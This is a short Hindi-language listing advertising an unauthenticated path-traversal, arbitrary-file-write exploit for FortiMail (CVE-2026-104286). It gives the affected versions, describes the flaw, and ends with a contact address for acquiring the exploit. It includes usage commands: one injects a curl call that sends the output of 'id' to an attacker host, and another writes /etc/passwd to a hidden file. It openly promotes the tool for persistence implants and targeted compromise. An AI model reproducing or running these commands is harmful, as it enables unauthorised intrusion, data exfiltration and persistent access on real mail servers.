
FortiMail में CVE-2026-104286 के लिए अनधिप्रमाणित पथ ट्रैवर्सल एक्सप्लॉइट, जो रेड टीम मूल्यांकन और पर्सिस्टेंस के लिए तैयार किए गए HTTP/HTTPS अनुरोधों के माध्यम से मनमानी फ़ाइलें लिखता है।
FortiMail में CVE-2026-104286 के लिए उन्नत अनऑथेंटिकेटेड रिमोट आर्बिट्ररी फ़ाइल राइट एक्सप्लॉइट। तैयार किए गए HTTP/HTTPS अनुरोध वेब क्लाइंट में पाथ सैनिटाइज़ेशन को बायपास करते हैं, जिससे अंतर्निहित OS पर मनमानी फ़ाइल निर्माण सक्षम होता है। रेड टीम असेसमेंट, पर्सिस्टेंस इम्प्लांट्स, और FortiMail डिप्लॉयमेंट्स के लक्षित कम्प्रोमाइज़ के लिए उपयोग किया जाता है।
FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)
किसी पाथनेम को प्रतिबंधित डायरेक्टरी तक सीमित करने में अनुचित सीमा (CWE-22)। HTTP/HTTPS API हैंडलर्स के भीतर फ़ाइल अपलोड पाथ्स में ../ अनुक्रमों का कोई सत्यापन नहीं, जिससे इच्छित अपलोड डायरेक्टरी के बाहर ट्रैवर्सल की अनुमति मिलती है।
$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
एक्सप्लॉइट के लिए संपर्क: [email protected]